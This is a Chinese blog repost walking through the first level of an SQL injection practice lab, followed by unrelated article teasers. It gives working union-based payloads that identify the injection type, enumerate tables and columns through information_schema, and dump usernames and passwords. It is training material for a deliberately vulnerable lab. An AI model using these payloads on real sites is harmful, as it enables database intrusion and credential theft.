SQL靶场第一关

SQL靶场第一关

news/2024/12/22 10:01:06/文章来源:https://blog.csdn.net/mirliasheong/article/details/144196261

打开sql靶场

一.判断注入类型

在网址输入?id=1，页面正常回显

我们在输入?id=1',页面报错，说明存在sql注入

我们再输入?id=1' and 1=1--+，页面正常回显

我们在输入?id=1' and 1=2--+，页面没有回显

这里我们知道了是字符型注入

为什么是字符型注入：and是两边都要为真才会执行，第一次?id=1' and 1=1--+两边都为真，说明可能是字符型，为了验证第一次的猜测，我们在and右边设置一个假条件1=2，输入?id=1' and 1=1--+页面不回显，验证了我们的猜测他是存在字符型注入。（--+是注释符）

二.判断列数

输入?id=1' order by 3--+，页面回显正常

在输入?id=1' order by 4--+，页面报错，说明存在三列

三.判断回显点

我们再输入?id=-1' union select 1,2,3--+，这样我们就看到了回显点在这

四.查询数据库

我们在把2替换成database()，就会得到数据库名

五.查询表名

得到数据库后我们开始报表

?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

六.查询列名

?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+

七.查询数据

-1' union select 1,group_concat(id,'~',username,'~',password),3 from users --+

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.xdnf.cn/news/36144.html

如若内容造成侵权/违法违规/事实不符，请联系一条长河网进行投诉反馈，一经查实，立即删除！

相关文章

ollama运行qwen2.5-coder:7b

ollama运行qwen2.5-coder:7b

1.linux安装 curl -fsSL https://ollama.com/install.sh | sh ollama serve # 启动ollama ollama create # 从模型文件创建模型 ollama show # 显示模型信息 ollama run # 运行模型，会先自动下载模型 ollama pull # 从注册仓库中拉取模…

阅读更多...

牛客——打印日期，日期累加（C++）

牛客——打印日期，日期累加（C++）

目录 1.日期累加 1.1题目描述 1.2思路 1.3 2.打印日期 2.1题目描述 2.2思路 2.3代码 1.日期累加 1.1题目描述计算一个日期加上若干天后是什么日期。输入第一行表示样例个数m，接下来m行每行四个整数分别表示年月日和累加的天数。输出m行，每行按…

阅读更多...

Stylus 浏览器扩展开发-Cursor AI辅助

Stylus 浏览器扩展开发-Cursor AI辅助

项目起源作为一个经常需要长时间盯着屏幕的开发者，我一直在寻找一个简单的方法来保护眼睛。最初的想法很简单：将网页背景色替换成护眼的豆沙绿。虽然市面上已经有类似的扩展，但我想要一个更加轻量且可定制的解决方案。这个简单的需求逐渐…

阅读更多...

AD20 原理图库和PCB库添加

AD20 原理图库和PCB库添加

一点击右下角二点击Components 三点击File-based Libraries Preferences 四最后点击安装即可

阅读更多...

微信小程序uni-app+vue3实现局部上下拉刷新和scroll-view动态高度计算

微信小程序uni-app+vue3实现局部上下拉刷新和scroll-view动态高度计算

微信小程序uni-appvue3实现局部上下拉刷新和scroll-view动态高度计算前言在uni-appvue3项目开发中,经常需要实现列表的局部上下拉刷新功能。由于网上相关教程较少且比较零散,本文将详细介绍如何使用scroll-view组件实现这一功能,包括动态高度计算、下拉刷新、上拉加载等完整…

阅读更多...

针对边缘计算优化LoRa的TinyML信道跳变管道

针对边缘计算优化LoRa的TinyML信道跳变管道

论文标题：Optimizing LoRa for Edge Computing with TinyML Pipeline for Channel Hopping（针对边缘计算优化LoRa的TinyML信道跳变管道） 作者信息：Marla Grunewald, Mounir Bensalem 和 Admela Jukan，来自德国布伦瑞克…

阅读更多...

Linux-USB驱动实验

Linux-USB驱动实验

USB 是很常用的接口，目前大多数的设备都是 USB 接口的，比如鼠标、键盘、USB 摄像头等，我们在实际开发中也常常遇到 USB 接口的设备，本章我们就来学习一下如何使能 Linux内核自带的 USB 驱动。注意！本章并不讲解具体的 …

阅读更多...

操作系统文件管理相关习题2

操作系统文件管理相关习题2

文件管理的任务和功能文件管理任务：对用户文件和系统文件进行组织管理，以方便用户使用，并保证文件的安全功能：文件存储空间的管理，目录管理，文件读写管理和保护目录管理对目录管理的要求实现按名存…

阅读更多...

MYSQL - 索引详解

MYSQL - 索引详解

一什么是索引？ 实际上在上一篇介绍MYSQL的体系结构当中我们稍微提及了一点，在引擎层，我们提到不同的引擎对应的索引的实现方式，选择是不一样的。简单理解，索引（index）其实就是一种帮助MYSQL高…

阅读更多...

AI智能体Prompt预设词指令大全+GPTs应用使用

AI智能体Prompt预设词指令大全+GPTs应用使用

AI智能体使用指南直接复制在AI工具助手中使用（提问前） 可前往SparkAi系统用户官网进行直接使用 SparkAI系统介绍文档：Docs 常见AI智能体GPTs应用大全在线使用自定义添加制作AI智能体进行使用： 文章润色器你是一位具有敏锐洞察…

阅读更多...

el-tree树形结构拖拽层级错乱问题

el-tree树形结构拖拽层级错乱问题

背景: 项目中有个文件夹树形菜单,并且各级菜单中的子级元素是可以任意拖拽的,也就是树形结构拖拽修改分组。问题分析： 出现拖拽层级错乱的问题，这通常意味着在进行节点拖拽操作后，树的层级关系没有正确地被维护。这可能是因为在更新节点位…

阅读更多...

线程和进程（juc）

线程和进程（juc）

线程一：概念辨析 1：线程与进程进程： 1：程序由指令和数据组成，指令要执行，数据要读写，就需要将指令加载给cpu，把数据加载到内存，同时程序运行时还会使用磁盘&#x…

阅读更多...

Java基础集合（Map）

Java基础集合（Map）

存储特点以键值对的形式存储, 一个元素由两个值组成键(K-key): 无序, 无下标, 元素不可重复值(V-value): 无序, 无下标, 元素可以重复常用实现类 HashMap JDK1.2 底层哈希表实现线程不安全, 效率高 LinkedHashMap JDK1.2 是HashMap的子类, 底层哈希表实现线程不安全…

阅读更多...

NEXT开发应用质量建议与测试指南

NEXT开发应用质量建议与测试指南

随着鸿蒙原生开发如火如荼的进展，NEXT对应用的质量提出了更高的要求。 NEXT的应用质量分为2个部分内容： ⚫ 体验质量： 功能数据完备、基础体验、HarmonyOS特征增强体验 ⚫ 内容合规： 资质、内容、广告、付费、开发者行为等单元测…

阅读更多...

java应用cpu占用过高故障排除

java应用cpu占用过高故障排除

首先一定要清楚：java应用造成cpu过高的主要原因 1：一般是线程一直处于可运行（Runnable）状态，通常这些线程在执行无阻塞操作、循环、正则或纯粹的计算等任务 2：另一个可能造成CPU高的原因是频繁GC&#xff…

阅读更多...

CPU是如何执行任务的？

CPU是如何执行任务的？

你清楚下面这几个问题吗？ 有了内存，为什么还需要 CPU Cache？ CPU 是怎么读写数据的？ 如何让 CPU 能读取数据更快一些？ CPU 伪共享是如何发生的？又该如何避免？ CPU 是如何调度任务的&#x…

阅读更多...

最短路径算法（Dijkstra算法 + Bellman-Ford 算法 + Floyd-Warshall算法）

最短路径算法（Dijkstra算法 + Bellman-Ford 算法 + Floyd-Warshall算法）

最短路径算法完整版万字原文见史上最全详解图数据结构 1. Dijkstra算法（单源最短路径）（无负权边图） 算法原理 1. Dijkstra 算法通过贪心策略计算从一个源顶点到其他所有顶点的最短路径。2. 时间复杂度为 O(V^2)&#xff08…

阅读更多...

pyqt6事件概要

pyqt6事件概要

例子： 利用qtdesigner建立闹钟 python代码 # 导入所需要的文件 from PyQt6.QtGui import QIcon, QPixmap from PyQt6.QtWidgets import QApplication, QMainWindow, QPushButton, QListWidgetItem from PyQt6 import uic from PyQt6.QtCore import Qt, QTime imp…

阅读更多...

位运算符I^~

位运算符I^~

&运算：上下相等才是1，有一个不同就是0 |运算：只要有1返回的就是1 ^(亦或)运算：上下不同是1，相同是0 ~运算：非运算，与数据全相反 cpu核心运算原理，四种cpu底层小电路例&#xf…

阅读更多...

【求助】Tinymce组件异常

【求助】Tinymce组件异常

版本号 { "tinymce/tinymce-vue": "^3.0.1", "tinymce": "^5.10.9", "vue": "^2.6.10", }问题： 就是红框处点击后没有菜单出现，下面是正常的

阅读更多...

最新文章